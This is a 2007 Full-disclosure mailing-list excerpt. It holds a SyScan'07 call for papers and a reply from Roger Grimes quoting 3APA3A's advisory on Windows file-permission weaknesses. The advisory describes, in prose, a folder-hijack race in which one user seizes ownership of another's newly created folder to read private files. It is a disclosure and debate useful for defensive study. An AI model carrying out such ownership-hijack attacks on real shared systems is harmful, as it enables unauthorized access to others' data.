The problem you describe? It has a 1-bit fix, SE_DACL_PROTECTED. All files would be created by default with full access to owner and SYSTEM. You can have fat lots of fun trying to figure out what will break and how.

A real solution would involve new DACL/SACL entries for directories that enforce "acceptable" security descriptors on the files contained therein. The same could work in the default DACL/SACL for tokens, enforcing policies for *all* objects created by that subject (yes, I put way too much thought in this. I am just gay for the Windows security model.
You can't not love a model where a subject might not belong to the "world" group)

(ReadDirectoryChangesW on the other hand *is* a vulnerability, as it gives traverse *and* list access but only requests traverse)

From organiser at syscan.org Fri Mar 9 04:23:10 2007
From: organiser at syscan.org (organiser at syscan.org)
Date: Fri, 09 Mar 2007 12:23:10 +0800
Subject: [Full-disclosure] SyScan'07 - Call for Paper - NEW UPDATES
Message-ID: <45F0E12E.2070605@syscan.org>

dear all

here are some updates to the SyScan'07 call for paper:

1. new topic. The following topics will be included:
   a. Web 2.0 - web services, PHP, .Net, web applications

2. Speakers' Privileges.
   a. Speakers at SyScan'07 with a brand new presentation will receive S$500 cash.
   b. Selected speakers will get a chance to present at conferences either in Korea or India.

**************************************************************************

*CALL FOR PAPER/TRAINING*

*ABOUT SYSCAN'07*

The Symposium on Security for Asia Network (SyScan) aims to be a very different security conference from the rest of the security conferences that the information security community in Asia has come to be so familiar and frustrated with. SyScan intends to be a non-product, non-vendor biased security conference. It is the aspiration of SyScan to congregate, in Singapore, the best security experts in their various fields, to share their research, discovery and experience with all security enthusiasts in Asia.

Besides the main conference, there will also be specialized security training courses in SyScan'07. These classes will be held before the main conference.

SyScan'07 will be held in Singapore at the Swissotel Merchant Court Hotel. The main conference will be held on 5th and 6th of July and the training will be held on 3rd and 4th of July, 2007.

*CFP Committee*

The Call for Paper committee for SyScan'07 comprises the following personnel:

1.
Thomas Lim - Organiser of SyScan and CEO of COSEINC
2. Dave Aitel - Founder of Immunitysec
3. Marc Maiffret - Founder and Chief Hacking Officer of eEye
4. Matthew "Shok" Conover - Symantec
5. Ong Geok Meng - McAfee

The CFP committee will review all submissions and determine the final list of speakers for SyScan'07.

*Speakers*

*Speakers' Privileges:*

* Return economy class air-ticket for one person.
* 3 nights of accommodation.
* Breakfast, lunch and dinner during conference.
* After-conference party.
* A very healthy dose of alcohol and fun.
* S$500 cash for speakers with brand new presentation.
* Selected speakers will get a chance to present in Korea and India at the end of the year.

*Topics*

The focus for SyScan'07 will include the following:

*/Operating Systems/*
* Vista
* Linux

*/Mobile Devices/Embedded systems/*
* SmartPhones
* PDAs
* Game Consoles

*/Networking/Telecommunication/*
* VoIP
* 3G/3.5G network
* IPv6
* WLAN/WiFi
* GPRS

*/Industry specific/*
* Banking and Financial Services sectors

*/Malware/*

*/BotNets/*

*/Web 2.0/*
* Web services
* PHP
* .Net
* Web applications

Any topics that will catch the attention of the CFP committee and/or the world.

*TRAINERS*

*Trainers' Privileges:*

* 50% of net profit of class.
* 2 nights of accommodation (conference).
* After-conference party.
* A very healthy dose of alcohol and fun.

Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue.
*Topics*

SyScan'07 training topics will focus on the following areas:

Web Applications
* .Net applications
* Java applications

Networks
* VoIP
* 3G/3.5G network
* IPv6
* WLAN/WiFi
* GPRS

Databases

Storage

*CFP Submission:*

CFP submission must include the following information:

1) Brief biography including list of publications and papers published previously or training classes conducted previously.
2) Proposed presentation/training title, category, synopsis and description.
3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement).
4) Employment and/or affiliations information.
5) Any significant presentation and educational/training experience/background.
6) Why is your material different or innovative or significant or an important tutorial?

Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission.

Training class will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission.

All submissions must be in English in either MS Office or PDF format. The more information you provide, the better the chance for selection.

Please send submission to cfp at syscan.org.

Submission for trainers must be done no later than 30th March 2007.
Submission for speakers must be done no later than 30th April 2007.

*Important Dates*

Final CFP Submission (Trainers) - 30th March 2007
Final CFP Submission (Speakers) - 30th April 2007
Notification of Acceptance (Trainers) - 15th April 2007
Notification of Acceptance (Speakers) - 15th May 2007
Final Accepted Presentation Material Submission (Speakers) - 5th June 2007

*OTHER INFORMATION*

Please feel free to visit the SyScan website to get a feel what this conference is all about - SHARE AND HAVE FUN!

By agreeing to speak at the SyScan'07 you are granting SyScan Pte. Ltd.
the rights to reproduce, distribute, advertise and show your presentation including but not limited to http://www.syscan.org, printed and/or electronic advertisements, and other forms of media.

--
Thank you

Thomas Lim
Organiser
SyScan'07
www.syscan.org

From roger at banneretcs.com Fri Mar 9 04:31:54 2007
From: roger at banneretcs.com (Roger A. Grimes)
Date: Thu, 8 Mar 2007 23:31:54 -0500
Subject: [Full-disclosure] Microsoft Windows Vista/2003/XP/2000 file management security issues
In-Reply-To: <1199291182.20070308225837@SECURITY.NNOV.RU>
References: <1199291182.20070308225837@SECURITY.NNOV.RU>
Message-ID: <096A04F511B7FD4995AE55F13824B8332127F5@banneretcs1.local.banneretcs.com>

I'm missing something here. In order for Alice to Take Ownership of Bob's private folder she would have to have Full Control in the parent Public folder or Bob's child folder, not just the Write/Modify permission. If Alice deletes Bob's folder (which she could do in some scenarios because she has the write/modify permission) and re-creates it, she becomes the Creator Owner and now Bob no longer has the ability to set permissions on it. If I take your strange assumptions, Bob could re-discover the newly created folder that Alice made, just like she did (I mean if you make up crap scenarios, why can't I), and do the same trick back to her.

And Windows does have a umask-like function. It's called Creator Owner. It's a well known SID, and the default permissions for it can be set so that any granular permission you want can be set to be default.

Vista does have symbolic links, and Windows has supported Junction Points (similar to symbolic links) since Windows 2000. The main difference is that Junction Points could only point to local resources and symbolic links can do remote resources as well.

You've come up with some strange scenarios below, and in all cases I could easily defeat the problem you are suggesting by using basic, recommended, security settings.
Why do you spend your time coming up with such weird scenarios to focus on? You're obviously a creative guy with some Windows security smarts. Why not focus on more realistic scenarios with more real-world use? There's plenty of them for us to focus on and to try and solve.

Roger

*****************************************************************
*Roger A. Grimes, InfoWorld, Security Columnist
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*email: roger_grimes at infoworld.com or roger at banneretcs.com
*Author of Professional Windows Desktop and Server Hardening (Wrox)
*http://www.amazon.com/gp/product/0764599909
*****************************************************************

-----Original Message-----
From: 3APA3A [mailto:3APA3A at SECURITY.NNOV.RU]
Sent: Thursday, March 08, 2007 2:59 PM
To: bugtraq at securityfocus.com; full-disclosure at lists.grok.org.uk
Subject: Microsoft Windows Vista/2003/XP/2000 file management security issues

This is an article I promised to publish after the Windows ReadDirectoryChangesW (CVE-2007-0843) [1] issue. It should explain why you must never place secure data inside an insecure directory.

Title: Microsoft Windows Vista/2003/XP/2000 file management security issues
Author: 3APA3A, http://securityvulns.com/
Vendor: Microsoft (and potentially other vendors)
Products: Microsoft Windows Vista/2003/XP/2000, Microsoft resource kit for Windows 2000 and different utilities.
Access Vector: Local
Type: multiple/complex (weak design, insecure file operations, etc)
Original advisory: http://securityvulns.com/advisories/winfiles.asp
Securityvulns.com news: http://security.nnov.ru/news/Microsoft/Windows/files.html

0. Intro

This article contains a set of attack scenarios to demonstrate security weakness in a few very common Windows management practices. None of the problems explained is critical, yet combined together they should force you to review your security practices.
I can't even say "vulnerabilities" because there is nothing you can call a "vulnerability". It's just something you believe is secure and it's not.

1.1 Problem: inability to create a secured file / folder in a public one.
Attack: folder hijack attack

First, it's simply impossible with the standard Windows interface to create something secured in an insecure folder.

Scenario 1.1: Bob wishes to create a "Bob private data" folder in the "Public" folder to place a few private files. "Public" has at least "Write" permissions for the "User" group.

Bob:
I   Creates "Bob private data" folder
II  Sets permission for the folder to allow access to the folder only to himself
III Copies private files into the folder

Alice wants to get access to the folder Bob created. She
Ia   Immediately after the folder is created, deletes the "Bob private data" folder and creates the "Bob private data" folder again (or simply takes ownership of the "Bob private data" folder if permissions allow). It makes Alice the folder owner.
IIa  Immediately after Bob sets permissions, she grants herself full control over the folder. She can do it as the folder owner.
IIIa Reads Bob's private files, because file permissions are inherited from the folder

Alice can use the "Spydir" (http://securityvulns.com/soft/) tool to monitor file access and automate this process. As you can see, [1] elevates this problem significantly.

This is not a new attack. Unix has the "umask" command to protect administrators and users. Currently, Windows has nothing similar. The CreateFile() API supports setting the file ACL on file creation (just like open() allows setting the mode on POSIX systems). An ACL can be securely set only on newly created files. This raises the problem of secure file creation.

1.2 Problem: Inability to lock / securely change permissions of an already created file
Attack: pre-open file/directory attack.

There are a few classes of insecure file creation attack (attempt to open existing file), exploitable under Unix